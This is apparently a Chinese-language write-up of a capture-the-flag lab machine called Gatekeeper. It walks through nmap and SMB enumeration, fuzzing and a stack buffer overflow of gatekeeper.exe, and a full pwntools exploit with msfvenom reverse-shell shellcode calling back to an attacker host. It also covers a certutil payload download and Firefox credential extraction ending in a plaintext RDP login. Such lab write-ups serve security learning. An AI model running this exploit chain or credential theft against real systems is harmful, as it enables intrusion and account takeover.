信息收集
首先使用nmap进行端口扫描,结果如下
nmap -sT -p- --min-rate 10000 -oA openPort
nmap -sV -O -A -p port1,port2,portN -oA version
nmap --script=smb.. -p 135,139,445 -oA 445Port
# Nmap 7.94SVN scan initiated Sat Jul 13 23:05:09 2024 as: nmap -sT -p- --min-rate 10000 -oA openPort 10.10.130.100
Warning: 10.10.130.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.130.100
Host is up (0.24s latency).
Not shown: 65262 closed tcp ports (conn-refused), 262 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
31337/tcp open Elite
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown
49164/tcp open unknown# Nmap done at Sat Jul 13 23:05:39 2024 -- 1 IP address (1 host up) scanned in 30.48 seconds
# Nmap 7.94SVN scan initiated Sat Jul 13 23:07:13 2024 as: nmap -sV -O -A --min-rate 10000 -oA version -p 135,139,445,3389,31337,49152-49155,49163-49164 10.10.130.100
Nmap scan report for 10.10.130.100
Host is up (0.25s latency).PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server?
|_ssl-date: 2024-07-14T03:10:14+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=gatekeeper
| Not valid before: 2024-07-13T03:05:08
|_Not valid after: 2025-01-12T03:05:08
| rdp-ntlm-info:
| Target_Name: GATEKEEPER
| NetBIOS_Domain_Name: GATEKEEPER
| NetBIOS_Computer_Name: GATEKEEPER
| DNS_Domain_Name: gatekeeper
| DNS_Computer_Name: gatekeeper
| Product_Version: 6.1.7601
|_ System_Time: 2024-07-14T03:10:08+00:00
31337/tcp open Elite?
| fingerprint-strings:
| FourOhFourRequest:
| Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
| Hello
| GenericLines:
| Hello
| Hello
| GetRequest:
| Hello GET / HTTP/1.0
| Hello
| HTTPOptions:
| Hello OPTIONS / HTTP/1.0
| Hello
| Help:
| Hello HELP
| Kerberos:
| Hello !!!
| LDAPSearchReq:
| Hello 0
| Hello
| LPDString:
| Hello
| default!!!
| RTSPRequest:
| Hello OPTIONS / RTSP/1.0
| Hello
| SIPOptions:
| Hello OPTIONS sip:nm SIP/2.0
| Hello Via: SIP/2.0/TCP nm;branch=foo
| Hello From: <sip:nm@nm>;tag=root
| Hello To: <sip:nm2@nm2>
| Hello Call-ID: 50000
| Hello CSeq: 42 OPTIONS
| Hello Max-Forwards: 70
| Hello Content-Length: 0
| Hello Contact: <sip:nm@nm>
| Hello Accept: application/sdp
| Hello
| SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|_ Hello
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31337-TCP:V=7.94SVN%I=7%D=7/13%Time=669340EF%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,24,"Hello\x20GET\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n"
SF:)%r(SIPOptions,142,"Hello\x20OPTIONS\x20sip:nm\x20SIP/2\.0\r!!!\nHello\
SF:x20Via:\x20SIP/2\.0/TCP\x20nm;branch=foo\r!!!\nHello\x20From:\x20<sip:n
SF:m@nm>;tag=root\r!!!\nHello\x20To:\x20<sip:nm2@nm2>\r!!!\nHello\x20Call-
SF:ID:\x2050000\r!!!\nHello\x20CSeq:\x2042\x20OPTIONS\r!!!\nHello\x20Max-F
SF:orwards:\x2070\r!!!\nHello\x20Content-Length:\x200\r!!!\nHello\x20Conta
SF:ct:\x20<sip:nm@nm>\r!!!\nHello\x20Accept:\x20application/sdp\r!!!\nHell
SF:o\x20\r!!!\n")%r(GenericLines,16,"Hello\x20\r!!!\nHello\x20\r!!!\n")%r(
SF:HTTPOptions,28,"Hello\x20OPTIONS\x20/\x20HTTP/1\.0\r!!!\nHello\x20\r!!!
SF:\n")%r(RTSPRequest,28,"Hello\x20OPTIONS\x20/\x20RTSP/1\.0\r!!!\nHello\x
SF:20\r!!!\n")%r(Help,F,"Hello\x20HELP\r!!!\n")%r(SSLSessionReq,C,"Hello\x
SF:20\x16\x03!!!\n")%r(TerminalServerCookie,B,"Hello\x20\x03!!!\n")%r(TLSS
SF:essionReq,C,"Hello\x20\x16\x03!!!\n")%r(Kerberos,A,"Hello\x20!!!\n")%r(
SF:FourOhFourRequest,47,"Hello\x20GET\x20/nice%20ports%2C/Tri%6Eity\.txt%2
SF:ebak\x20HTTP/1\.0\r!!!\nHello\x20\r!!!\n")%r(LPDString,12,"Hello\x20\x0
SF:1default!!!\n")%r(LDAPSearchReq,17,"Hello\x200\x84!!!\nHello\x20\x01!!!
SF:\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%), Microsoft Windows 7 Ultimate SP1 or Windows 8.1 Update 1 (96%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: GATEKEEPER; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:d8:aa:d3:b1:8d (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: gatekeeper
| NetBIOS computer name: GATEKEEPER\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-07-13T23:10:07-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 48m00s, deviation: 1h47m20s, median: 0s
| smb2-time:
| date: 2024-07-14T03:10:07
|_ start_date: 2024-07-14T03:05:02TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 249.25 ms 10.9.0.1
2 249.34 ms 10.10.130.100OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 13 23:10:14 2024 -- 1 IP address (1 host up) scanned in 181.09 seconds
# Nmap 7.94SVN scan initiated Sat Jul 13 23:10:30 2024 as: nmap --script=smb-enum-users.nse,smb-enum-shares.nse,smb-vuln-ms17-010.nse -p135,139,445 -oA /home/kali/Gatekeeper/445Port 10.10.130.100
Nmap scan report for 10.10.130.100
Host is up (0.25s latency).PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-dsHost script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.130.100\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.130.100\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.130.100\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: READ
| Current user access: READ/WRITE
| \\10.10.130.100\Users:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ# Nmap done at Sat Jul 13 23:11:22 2024 -- 1 IP address (1 host up) scanned in 52.26 seconds
通过扫描结果发现开放对我们有用的端口有445 3389 31337
首先上述的扫描结果中445端口有一个Users目录拥有读取权限,连接发现程序gatekeeper.exe,将其下载
在本地虚拟机中运行
进入了监听状态,应该是开放了一个端口,根据扫描的结果31337,猜测该程序可能就会开启31337端口,使用netstat -an -p tcp查看
使用nc连接查看
该程序可能存在栈溢出漏洞,访问靶机的31337端口是否和该程序一样
可以看到是一样的程序
接下来的思路就是使用debug工具对该程序进行栈溢出漏洞调试并利用,和之前学习的步骤类似,这里就不在详细讲解
漏洞调试
我自己使用pwntools写了一个fuzz简易脚本
import time
from pwn import *
# context(log_level="debug")padding = b"A" * 50
while True:try:p = remote("192.168.226.132",31337)p.sendline(padding)print(f"send {len(padding)} bytes Test!")p.recv()except:print(f"at {len(padding)} bytes error")padding += b"A" * 50time.sleep(1)
该程序每次回多增加50个字符到缓冲区,将程序使用debug程序运行
运行脚本
脚本在150个字符卡住了,接着测试在那个字符造成溢出,我自己写了一个脚本,如下
from pwn import *
context(log_level='debug')offset = 0
payload = b"A" * offset
payload += b""p = remote("10.10.163.211",31337)
p.sendline(payload)p.recv()
使用msf-pattern_create生成150个字符,填充到payload += b""变量中
from pwn import *
context(log_level='debug')offset = 0
payload = b"A" * offset
payload += b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"p = remote("10.10.163.211",31337)
p.sendline(payload)p.recv()
接着重启程序,运行脚本
将EIP复制使用msf-pattern_offset查找字符偏移
缓冲区的大小为146,将该值替换到offset变量中
offset = 146
接着将脚本中之前的垃圾字符删除,加上一条payload += b"BBBB"代码
from pwn import *
context(log_level='debug')offset = 146
payload = b"A" * offset
payload += b"BBBB"p = remote("192.168.226.132",31337)
p.sendline(payload)p.recv()
重启程序,再次运行脚本,这次EIP为漏洞验证,EIP的值应该被覆盖为了42424242
成功了
接着生成除了\x00的所有坏字符,测试坏字符
!mona bytearray -b "\x00"
将坏字符加入脚本中
from pwn import *
context(log_level='debug')offset = 146
payload = b"A" * offset
payload += b"BBBB"
payload += (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)p = remote("192.168.226.132",31337)
p.sendline(payload)p.recv()
重启程序,再次运行脚本
复制ESP运行mona插件查找坏字符
!mona compare -f C:\mona\gatekeeper\bytearray.bin -a 009E19E4
坏字符为\x00\x0a,接着查找jmp esp
!mona jmp -r esp -cpb "\x00\x0a"
将地址使用小端排序存储填充到BBBB处
payload += b"\xc3\x14\x04\x08" # 0x080414c3
接着生成shellcode,往下继续拼接payload
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.226.131 LPORT=4444 EXITFUNC=thread -b "\x00\x0a" -f c
为了shellcode正常执行,需要填充一些nop,\x90,最终的脚本如下
from pwn import *
context(log_level='debug')offset = 146
payload = b"A" * offset
payload += b"\xc3\x14\x04\x08" # 0x080414c3
payload += b"\x90" * 16
payload += (b"\xdb\xc2\xba\xdb\x7f\xc7\xbd\xd9\x74\x24\xf4\x5b\x31\xc9"b"\xb1\x52\x31\x53\x17\x83\xc3\x04\x03\x88\x6c\x25\x48\xd2"b"\x7b\x2b\xb3\x2a\x7c\x4c\x3d\xcf\x4d\x4c\x59\x84\xfe\x7c"b"\x29\xc8\xf2\xf7\x7f\xf8\x81\x7a\xa8\x0f\x21\x30\x8e\x3e"b"\xb2\x69\xf2\x21\x30\x70\x27\x81\x09\xbb\x3a\xc0\x4e\xa6"b"\xb7\x90\x07\xac\x6a\x04\x23\xf8\xb6\xaf\x7f\xec\xbe\x4c"b"\x37\x0f\xee\xc3\x43\x56\x30\xe2\x80\xe2\x79\xfc\xc5\xcf"b"\x30\x77\x3d\xbb\xc2\x51\x0f\x44\x68\x9c\xbf\xb7\x70\xd9"b"\x78\x28\x07\x13\x7b\xd5\x10\xe0\x01\x01\x94\xf2\xa2\xc2"b"\x0e\xde\x53\x06\xc8\x95\x58\xe3\x9e\xf1\x7c\xf2\x73\x8a"b"\x79\x7f\x72\x5c\x08\x3b\x51\x78\x50\x9f\xf8\xd9\x3c\x4e"b"\x04\x39\x9f\x2f\xa0\x32\x32\x3b\xd9\x19\x5b\x88\xd0\xa1"b"\x9b\x86\x63\xd2\xa9\x09\xd8\x7c\x82\xc2\xc6\x7b\xe5\xf8"b"\xbf\x13\x18\x03\xc0\x3a\xdf\x57\x90\x54\xf6\xd7\x7b\xa4"b"\xf7\x0d\x2b\xf4\x57\xfe\x8c\xa4\x17\xae\x64\xae\x97\x91"b"\x95\xd1\x7d\xba\x3c\x28\x16\x05\x68\xd0\x65\xed\x6b\x14"b"\x7b\xb2\xe2\xf2\x11\x5a\xa3\xad\x8d\xc3\xee\x25\x2f\x0b"b"\x25\x40\x6f\x87\xca\xb5\x3e\x60\xa6\xa5\xd7\x80\xfd\x97"b"\x7e\x9e\x2b\xbf\x1d\x0d\xb0\x3f\x6b\x2e\x6f\x68\x3c\x80"b"\x66\xfc\xd0\xbb\xd0\xe2\x28\x5d\x1a\xa6\xf6\x9e\xa5\x27"b"\x7a\x9a\x81\x37\x42\x23\x8e\x63\x1a\x72\x58\xdd\xdc\x2c"b"\x2a\xb7\xb6\x83\xe4\x5f\x4e\xe8\x36\x19\x4f\x25\xc1\xc5"b"\xfe\x90\x94\xfa\xcf\x74\x11\x83\x2d\xe5\xde\x5e\xf6\x05"b"\x3d\x4a\x03\xae\x98\x1f\xae\xb3\x1a\xca\xed\xcd\x98\xfe"b"\x8d\x29\x80\x8b\x88\x76\x06\x60\xe1\xe7\xe3\x86\x56\x07"b"\x26"
)p = remote("192.168.226.132",31337)
p.sendline(payload)p.recv()
重启程序,监听4444,运行脚本获得反弹shell
获取FLAG
同样的步骤只需要修改IP运行即可获取靶机的反弹shell
获取user.txt
权限提升
虽然没有成功记录一下我的思路,首先在生成反弹shell代码的时候可以直接反弹meterpreter,但是这里我生成的反弹的是普通的shell,我需要提升为meterpreter的终端
于是我生成了一个shell.exe,然后使用python -m http.server 80共享,靶机使用certutil -split -f -urlcache下载,于是我得到一个meterpreter终端
接着我尝试使用post/multi/recon/local_exploit_suggester来查找可能存在的提权
我在尝试最后一个的时候并没有获取shell,不知道为什么
然后使用winPEAS没有回显,手动收集没有得到实际用途的信息,于是就没有了头绪,参考博客发现是firefox中保存的凭据
使用firefox_creds保存凭据
我更改了名称
接着需要使用github上的一个脚本解析这些凭据,地址: https://github.com/unode/firefox_decrypt/blob/main/firefox_decrypt.py
运行后得到mayor用户的凭据
python firefox_decrypt.py ./firefox
./firefox文件夹中保存着导出的所有凭据
接着使用xfreerdp连接到靶机
xfreerdp /u:mayor /p:8CL7O1N78MdrCIsV /sec:rdp /v:10.10.163.211 +clipboard
得到root.txt
实验结束。
![[Unity] Dreamteck Splines实现沿路径移动功能](https://img2023.cnblogs.com/blog/2583637/202407/2583637-20240714165423885-405166439.gif)
